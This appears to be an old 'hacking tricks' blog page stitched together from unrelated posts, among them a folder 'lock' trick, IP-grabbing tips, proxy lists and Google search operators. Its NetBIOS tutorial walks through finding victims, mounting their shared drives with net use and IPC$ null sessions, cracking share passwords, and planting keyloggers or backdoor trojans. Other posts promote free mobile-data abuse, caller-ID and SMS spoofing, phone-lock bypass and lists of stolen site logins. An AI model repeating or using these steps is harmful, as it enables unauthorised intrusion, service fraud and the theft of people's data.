Sunday, March 14, 2010

How to Lock a Folder Using Notepad

How to Lock a Folder Using Notepad


1) Consider you want to lock a folder named caclub in your f:\, whose path is f:\caclub

2) Now open the Notepad and type the following

ren caclub caclub.{21EC2020-3AEA-1069-A2DD-08002B30 309D}

3) Where caclub is your folder name. Save the text file as loc.bat in the same drive.

4) Open another new notepad text file and type the following

ren caclub.{21EC2020-3AEA-1069-A2DD-08002B30 309D} caclub

5) Save the text file as unloc.bat in the same drive.
---------
Usage:
---------
6) To lock the caclub folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
7) To unlock the folder click the unloc.bat file. Thus the folder will be unlocked and the contents are accessible.

free hit counter
free hit counter

How to get ip address of person u r chatting with on msn messenger

when you 're online chatting with the contact
send him a file
close the browser
then go to
start
command
write cmd
then
netstat -na
then you will see all your connections and also the ip of that person

then goto
http://www.geobytes.com/IpLocator.htm
introduce the IP and all the information will be shown

hide ur ip address

go to options - settings - paste any proxy there
enjoy surfing


IP address Anonymity level Checked time Country
69.217.73.52: 8080 anonymous server Feb-08, 17:45 United States
217.28.206.145: 80 anonymous proxy Feb-08, 17:45 Sweden
97.81.19.227: 8080 anonymous server Feb-08, 19:00 United States
217.7.172.14: 80 anonymous proxy Feb-08, 17:46 Germany
202.115.130.23: 8080 anonymous Feb-08, 17:45 China
209.194.182.139: 8080 anonymous proxy Feb-08, 17:46 United States
80.87.131.100: 80 anonymous proxy Feb-08, 17:46 United Kingdom
196.12.184.190: 3128 anonymous proxy Feb-08, 17:46 Puerto Rico
217.21.240.107: 80 anonymous Feb-08, 18:00 Netherlands
202.147.186.196: 8080 anonymous proxy Feb-08, 18:01 Pakistan
140.116.21.154: 8080 anonymous proxy Feb-08, 18:01 Taiwan
87.248.174.68: 8080 anonymous Feb-08, 18:01 Moldova, Republic of
213.157.69.92: 80 anonymous Feb-08, 18:02 Finland
81.211.26.66: 8080 anonymous proxy server Feb-08, 18:03 Russian Federation
77.48.19.55: 80 anonymous Feb-08, 18:03 Czech Republic
59.106.138.10: 80 anonymous Feb-08, 18:04 Japan
60.250.0.22: 80 anonymous server Feb-08, 18:01 Taiwan
213.212.254.34: 8080 anonymous server Feb-08, 18:05 Egypt
82.102.77.66: 8080 anonymous proxy Feb-08, 18:06 Cyprus
87.205.199.25: 80 anonymous proxy server Feb-08, 18:59 Poland
62.80.4.61: 8080 anonymous server Feb-08, 17:38 Germany
80.156.84.228: 80 anonymous Feb-08, 17:30 Germany
196.218.197.68: 8080 anonymous proxy Feb-08, 17:50 Egypt
12.149.212.1: 80 anonymous proxy server Feb-08, 17:48 United States
216.244.98.133: 80 anonymous proxy Feb-08, 17:48 United States
220.227.178.26: 80 anonymous proxy server Feb-08, 17:51 India
200.85.39.18: 80 anonymous Feb-08, 17:51 Paraguay
217.116.232.114: 80 anonymous Feb-08, 17:51 Denmark
8.12.40.183: 80 anonymous Feb-08, 17:47 United States
203.115.229.180: 80 anonymous proxy Feb-08, 17:48 Malaysia
66.216.91.200: 80 anonymous server Feb-08, 17:01 United States
200.68.73.193: 443 anonymous proxy Feb-08, 17:02 Argentina
75.82.204.246: 3128 anonymous proxy Feb-08, 17:02 United States
193.251.181.135: 8080 anonymous proxy server Feb-08, 17:49 France

hack using NetBIOS ( hacking someones remote computer)

I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS

A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-

Name of the computer

Username

Domain

Computer Name

and many others.

Like any other service it also works on a port . It has been assigned a port number 139.


THE NBTSTAT COMMAND




You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get

c:\windows>

If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.

Now lets play with the NBTSTAT command.

If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.

c:\windows>nbtstat/?

If you want to get the NetBIOS information of your computer type the following command

c:\windows>nbtstat -a 127.0.0.1

This command will list the NetBIOS information. A typical example

NetBIOS Remote Machine Name Table

Name Number Type Usage

==========================================================================

workgroup 00 G Domain Name

my_computer 03 U Messenger Service

myusername 03 U Messenger Service


MAC Address = 00-02-44-14-23-E6

Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.

This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -a ipaddress

Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command

NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.

c:\windows>nbtstat -a 203.195.136.156


WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.


TYPES OF ATTACKS

We can launch two types of attack on the remote computer having NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service



Searching for a victim

You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.



Lets Hack -Part 1 Remotely reading/writing to a victiim's computer

Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .
The command that you will use to view the NetBIOS name is

c:\windows>nbtstat -a 203.195.136.156

Let suppose that the output comes out to be

NetBIOS Remote Machine Name Table

Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered


MAC Address = 00-02-44-14-23-E6



The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------------------------------------------------------------------------------------------------------------------------------

NOTE - If you do not get this number there are two possibilities

1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .

2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.

---------------------------------------------------------------------------------------------------------

Now our next step would be to view the drive or folders the victim is sharing.

We will use command

c:\windows>net view \\203.195.136.156

Let suppose we get the following output

Shared resources at \\203.195.136.156
ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
CDISK Disk


The command completed successfully.



"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like



Shared resources at \\203.195.136.156


ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
HP-6L Print


"Print " shows that the victim is sharing a printer named as HP-6L

If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.

Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.

Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .

Lets do it.

We will use the NET command to do our work .

Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!


Cracking Share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -

Windows 95

Windows 98

Windows Me




Using IPC$ to hack Windows NT,2000,XP

Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.

We hackers use IPC$ in this way

c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""

You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.

Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.



Penetrating in to the victim's computer

Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...

But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission






Lets Hack - Part 2 Denial of service attack


This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.












Note- This tutorial may bear a resemblance to tutorials written by other authors

Free GPRS

This is the new trick for the user of idea cellular.
cell phone or pc/laptop.....

Before starting the detailed procedure these things described as


#1... YOU MUST NOT HAVE CONNECTION !
#2... YOU MUST NOT HAVE ANY ACTIVE PLANS OF GPRS/INTERNET !
#3... YOU MUST HAVE PREPAID CONNECTION !( USING OF THIS TRICK IN

POST PAID WILL LEAD TO YOU HIGHER AMOUNT OF BILL )
#4... YOU MUST HAVE TO USE S60 DEVICES OR HIGHER..NEVER USE THIS

TRICK FOR THE S40 DEVICES(FOR CERTAIN S40 DEVICES THIS TRICK

WORKS)
#5... THIS TRICK HAS BEEN TESTED SUCCESSFULLY IN NOKIA AND SONY

ERICSSON DEVICES !

NOW COME TO THE PROCEDURE TO GET FREE INTERNET:

From your idea cell phone type GP13 and send it to 4444.
now you will receive that your GP13 pack will be activated within

24 hours...
now wait for 12 to 16 hours..
now send the same sms to 4444..
you will receive that your request has been already registered.
now again after 24 hours you will find that your GP13 pack has

been activated...!!!

BUT thats not a trick...yes because you have been have been

charged 13 rs because of activation of GP13..
real trick starts now..

After successfull activation of GP13 pack just send NOGP13 to

4444.(4444 No is free of charge)
you will receive that your GP13 pack will be deactivated within

24 hours..
now after just 10 to 12 hours of sending dectivation sms again

send GP13 to 4444..

now its enough ...you have completed your all steps to get free

internet..
its because due to last activation sms after deactivation sms

system will be hacked!!!System isnt able to take decision what to

do!!

now after some time of sending sms for activation just reboot

your system from file explorer..

now restart your device/cell..you are able to surf free..

but note that if you are using cell phone than use opera mini or

uc web browser and if you are using pc/laptop than use smart web

browser or opera 9.27.

if you wish to use proxy for your opera than you must have to use

the proxy given below.....

1.
i.p.Adderss: 12.148.192.178
Port :1080(common for all)

2.
i.p.Adderss: 63.127.192.178

3.
i.p.Adderss: 199.105.112.152

4.
i.p.Adderss: 199.105.112.163

5.
i.p.Adderss: 12.148.162.37.......

BSNL hack for Internet

Free gprs in bsnl

here are the steps to perform:-

Logic: the server has a major bug in it, by which it fails to block two simultaneous connections from the phone and establishes a connection with full internet working,

Supported devices: all phones with multichannel gprs support

For connection on your mobile phone:-

1) Make two connections like bsnlportal and BSNLPORTAL1

(names of profile don’t matter, u can keep one as billgates and shahrukhkhan lol..the basic purpose of names is to enable the user to differentiate between the two accounts,)

2) Select the application you got to have the full connection working on.
Surpassingly “web” now just select “bsnlportal” profile and select a link like wap.cellone.in the page will get open, just press the red button such that the “web” application goes in the background.
Make sure that the gprs connection is still established with the web app. Two parallel lines on the top left of the screen will confirm this

3) Now open any other app that requires web connection like opera. Select BSNLPORTAL and open any other link like wap.google.com, u will get error –

the aim of using the other app is to perform multi-channel gprs,
this is verified by seeing some dots on the pre-existing connection established by “web”

(step 2)

“Access denied.

Technical description:
403 Forbidden - You are not allowed to communicate with the requested resource.”

4) close opera and open web and open a site like esato.com

5) if everything is done as said here then esato will load and voila! We have the whole internet!

For connection on pc.

1)create a connection and enter the number to be dialed as *99***1#

2) enter the following string as extra initialization command

3)now dial from pc, the connection will be established

4)pick the phone and open “web” open “wap.cellone.in” the phone shows error .

5) close “web” and then from the browser open www.google.com
and voila! The whole intenet is here

settings for profiles

apn: celloneportal
ip: 192.168.51.163
port : 8080

leave other fields blank as they are of the least concern!

the browser settings on pc too go the same as mentioned above!

Google Search Hacking

Well if u ask me this is the best Part " how to Search ",

Anyone anywhere needs something out fo the great "www",

now if u know how to grab hold to "something" in one click that is the skill,

this article henceforth is one of my best my best,

n especially crafted to meet all ur needs !!

This page is continued to

Click here to visit Page II

Songs
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER ARTIST OR SONG NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+mp3+OR+wma+OR+ogg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Ebook
javascript:Qr='';if(!Qr){void(Qr=prompt('Enter Author name OR Book name:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+pdf+OR+rar+OR+zip+OR+lit+OR+djvu+OR+pdb+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Image
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER IMAGE NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+jpg+OR+png+OR+bmp+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
movie
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER MOVIE NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+avi+OR+mov+OR+mpg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Application
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER Application NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+exe+OR+rar+OR+zip+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
game
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER GAME NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+exe+OR+iso+OR+rar+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'

Just copy from javascript and paste this on u r add bar and enter the details andEnjoy!



Google Operators:



Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers’ weapons
Basic Operators:


+, -, ~ , ., *, “”, |,

OR


Advanced Operators:

allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange





Basic Operators !!




(+) force inclusion of something common

Google ignores common words (where, how, digit, single letters) by default:
Example: StarStar Wars Episode +I

(-) exclude a search term
Example: apple –red

(“) use quotes around a search term to search exact phrases:
Example: “Robert Masse”

Robert masse without “” has the 309,000 results, but “robert masse” only has 927 results. Reduce the 99% irrelevant results




Basic Operators




(~) search synonym:
Example: ~food
Return the results about food as well as recipe, nutrition and cooking information



( . ) a single-character wildcard:
Example: m.trix



Return the results of M@trix, matrix, metrix…….
( * ) any word wildcard




Advanced Operators: “Site:”





Site: Domain_name
Find Web pages only on the specified domain. If we search a specific site, usually we get the Web structure of the domain

Examples:

site:http://rahulhackingarticles.wetpaint.com




Advanced Operators: “Filetype:”





Filetype: extension_type

Find documents with specified extensions

The supported extensions are:

- HyperText Markup Language (html) - Microsoft PowerPoint (ppt)
- Adobe Portable Document Format (pdf) - Microsoft Word (doc)
- Adobe PostScript (ps) - Microsoft Works (wks, wps, wdb)
- Lotus 1-2-3 - Microsoft Excel (xls)
(wk1, wk2, wk3, wk4, wk5, wki, wks, wku) - Microsoft Write (wri)
- Lotus WordPro (lwp) - Rich Text Format (rtf)
- MacWrite (mw) - Shockwave Flash (swf)
- Text (ans, txt)


Note: We actually can search asp, php and cgi, pl files as long as it is text-compatible.

Example: Budget filetype: xls




Advanced Operators “Intitle:”




Intitle: search_term

Find search term within the title of a Webpage

Allintitle: search_term1 search_term2 search_term3
Find multiple search terms in the Web pages with the title that includes all these words

These operators are specifically useful to find the directory lists


Example:
Find directory list:
Intitle: Index.of “parent directory”




Advanced Operators “Inurl:”



Inurl: search_term
Find search term in a Web address

Allinurl: search_term1 search_term2 search_term3
Find multiple search terms in a Web address


Examples:
Inurl: cgi-bin
Allinurl: cgi-bin password



Advanced Operators “Intext;”



Intext: search_term
Find search term in the text body of a document.

Allintext: search_term1 search_term2 search_term3
Find multiple search terms in the text body of a document.


Examples:
Intext: Administrator login
Allintext: Administrator login




Advanced Operators: “Cache:”




Cache: URL
Find the old version of Website in Google cache

Sometimes, even the site has already been updated, the old information might be found in cache


Examples:
Cache: http://rahulhackingarticles.wetpaint.com




Advanced Operators




..
Conduct a number range search by specifying two numbers, separated by two periods, with no spaces. Be sure to specify a unit of measure or some other indicator of what the number range represents


Examples:
Computer $500..1000
DVD player $250..350




Advanced Operators: “Daterange:”




Daterange: -

Find the Web pages between start date and end date

Note: start_date and end date use the Julian date
The Julian date is calculated by the number of days since January 1, 4713 BC. For example, the Julian date for August 1, 2001 is 2452122


Examples:
2004.07.10=2453196
2004.08.10=2453258


Vulnerabilities date range: 2453196-2453258



Advanced Operators “Link:”




Link: URL
Find the Web pages having a link to the specified URL

Related: URL
Find the Web pages that are “similar” to the specified Web page
info: URL

Present some information that Google has about that Web page
Define: search_term

Provide a definition of the words gathered from various online sources


Examples:
Link: rahulhackingarticles.wetpaint.com
Related:
rahulhackingarticles.wetpaint.com
Info: rahulhackingarticles.wetpaint.com

Define: Network security




Advanced Operators “phonebook:”



Phonebook
Search the entire Google phonebook
rphonebook
Search residential listings only
bphonebook
Search business listings only


Examples:
Phonebook: robert las vegas (robert in Las Vegas)
Phonebook: (702) 944-2001 (reverse search, not always work)
The phonebook is quite limited to U.S.A

Google Stuff

Thanks to Gmail, Google knows who you are e-mailing, what you are saying and it will store all your e-mails forever. Thanks to Google Talk,

Watch the articles on the Left side navigation Tab !!!



Google it : Rahul
Google knows who you are talking to and who your closest associates are. And if Gmail and Google Talk were not enough, because of Orkut, Google knows who sits in your circle of friends. Thanks to Google Search, Google knows what you are searching for on the Web, including the news, type of images and newsgroup access. Thanks to Google Video, Google knows what kind of risqué videos you like to watch. Thanks to Google Finance, Google knows what stocks and businesses you are interested in. Thanks to Blogger, Google knows what you rant about and what rants you like reading. Thanks to Google Maps, Google knows where your house is and where you are going. Thanks to Google Calendar, Google knows who you are meeting with, where you are going, and what you are busy doing. Thanks to Picasa, Google even knows what you, your family, and your best friends look like. Best of all, thanks to Google Desktop, Google has access to all your documents, images, files, and everything else on your hard drive. And when Google displays customised adverts based on the e-mails you receive and searches you make, and you happen to click one of them, Google knows the kind of things you are interested in

USEFULL LINKS

SOME USEFULL IP TRICKS N TIPS....

This is a complimation of computer tricks, mainly security and privacy related

Getting Ip's:--

To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).
Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.
Type netstat -r at the command prompt to see the ip of all computers you are connected to

In MSN (and other programs) when you are chatting to someone everything you type goes through the MSN servers first (they act as a proxy) so you see their ip rather than who you are chatting to. You can get round this by sending them a file as MSN doesn't send file through its proxy.
When you type the netstat -r (or -a for a different view) the ip's are under the foreign address table. The ports are seperated by a : . Different programs use different ports, so you can work out which ip's are from which program.
Connecting to other computers and what ports are:--

Servers send information. Clients retrieve. Simple.
Windows comes with a built in program to connect to other computers called telnet.
To start Windows telnet Start menu> Run> type Telnet. Click connect> remote system
Ports are doors into computers. Hosts are computer names
(ip number or a name that is translated into the ip automatically)
Different programs open different ports, but they always open the same ports so other computers know which port to connect to. You can get a port list listing all the different ports, but a basic one is:
11 :- Sends info on the computer
21 :- FTP (File transfer program)
23 :- Telnet (Login to the computers command line)
25 :- Smtp (Sends mail)
80 :- Http (Web pages)
There are thousands of different programs using different ports. You can get programs called portscanners which check a computer for all ports up to a certain number, looking for ways in. You can portscan a computer looking for ways-in.
Anyway, back to telnet.
Type www.yahoo.com as the host and port as 80 the click connect.
If nothing happens, you're in. Wow. You are connected to Yahoo's server.
You can now type http commands (you are connected to an http server, so it supports http commands). Ie. on an ftp server you can type open and it will do something. On an http server it will just wonder what the hell you are on about.
Type get / http/1.0 then press enter twice to get the file on the server at / (try /index.html) etc.)
Allowing dos and regedit in a restricted Windows

See http://blacksun.box.sk/tutorials/format.php3?file=windows.html for some very cool tactics.
A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0

Save it as something.reg then run it. Simple.

Making undeletable, unreadable folders

Tested on Windows 95/98
By holding down alt, then typing numbers on the number pad (right of the keyboard) you can create special characters. If you hold down alt, then press 1, then let go, you got the ascii character 1. You try some randomn numbers. This goes all the way up to 255. Open a dos prompt, and type md (alt+1+9+4)someword. md is the dos command to make a directoy, now try and open the directory in Windows, you can't. To open it, type ren (alt+1+9+4)someword someword (ren is the dos command to rename)

Proxies

Proxies are computers that you connect through, hiding your computer. Most aren't anonymous, they give away your ip. Some are. Good anonymous proxies: mail.uraltelecom.ru:8080 and 194.247.87.4:8080.
Different programs require different ways of using proxies. To do it in internet explorer 5 go to tools, internet options, connections, settings. In the above proxies they are in the format host:port

Password files
If you lock yourself out of Windows stuff, all passwords are stored in files called *.pwl in C:windows. Download showpass.zip from hereto view all passwords stored. Or rename the files to .bak to delete passwords.
In Unix, passwords are normally stored at etc/passwd. This can be viewed using the cat command (prints a file to screen): cat etc/passwd. Make sure you're passwords are shadowed (not actually in etc/passwd). Also make sure they aren't in a file called shadow, especically not in a file called etc/shadow.
Unix passwords are encrypted far better than Windows one's (to be fair, Windows 95 isn't designed for users), but can still be cracked through a program called jon



Note- This tutorial may bear a resemblance to tutorials written by other authors

Use any USB stick As Ram ! Advanced search!..

For those who aren't keen on opening up their PC to put in more memory, Windows Vista has a handy little feature called ReadyBoost that can use USB sticks for additional memory. Unfortunately, Windows Vista doesn't take kindly to the slower sticks on the market and refuses to use them. Proving once again that we control the computer and not the other way around, here's four simple steps to get around this limitation and use any USB stick you have to increase your computers memory.

1.SetUp




First things first. Plug the device in. Ignore AutoPlay if you have the enabled, and go to Computer in the start menu. When it pops up, right-click the USB stick and select properties.

2. Disable the stick



Click on the Readyboost tab on the properties menu and check Do not restest this device. Click okay and unplug the stick from your computer.


3. Edit the registry!



Woah! Don't panic, it's not as frightening as it sounds. Firstly, you need to open regedit, by opening the start menu and typing regedit, then enter. The registry window should load up.

Using the left-hand pane, work your way through the following folders: HKLM (Local Machine) -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> EMDgmt. You'll have a list of USB devices the computer has encountered, one of which should be your USB stick. Click on it.

Here there's a few details you need to edit. Double click on Device Status and change the value to 2, then ok. Do the same for ReadSpeedKBs and WriteSpeedKBs, changing their values to both 1000. Exit the regedit and breathe a sigh of relief.


4. And back in again



Now all that's left to do is put the stick back in and once again go to the device properties (Computer > Right-click on drive). If you look under the Readyboost Tab, you'll be able to now select Use this device. Success! Now enjoy your faster PC.

WANT FREE USERNAME AND PASSWORD OF ANY SITE?????

u can surf any site without rigestring it
click the link below (right click the LINK and open it in new window or new tab)

LINK

just type the site name and get plenty of working username and passwords.

Send SMS to anyone from any person's number.......

click the link below (right click the link and open it in new window or new tab)

LINK


if above link does not open at day try at night

PLZZZ dont use for crime..........

You can hack any cell phone having security lock......

Install this application(MCODE) on your cell phone
download from the link below

DOWNLOAD (right click on download and open in new window or tab)

after downloading install it on your phone and run the application
now enter the IMEI of any phone which you want to hack.

NOTE: application works with s60 mobiles

Call anyone from any person's number free......

click the link below

LINK (right click the link and open it in new window or new tab)


dont misuse it.........





Free airtel gprs (surfing + download) using airtel LIVE

Open http://flyproxy.com on your mobile browser

then type the URL .......
now enjoy free surfing (even in 0 balance)......


other way to surf free using Airtel Live is to download the browser ucweb on your mobile

DOWNLOAD (right click the link and open it in new window or new tab)

use direct connection.

donot download anything from ucweb , download can be charge

NOTE: this post is just for information purpose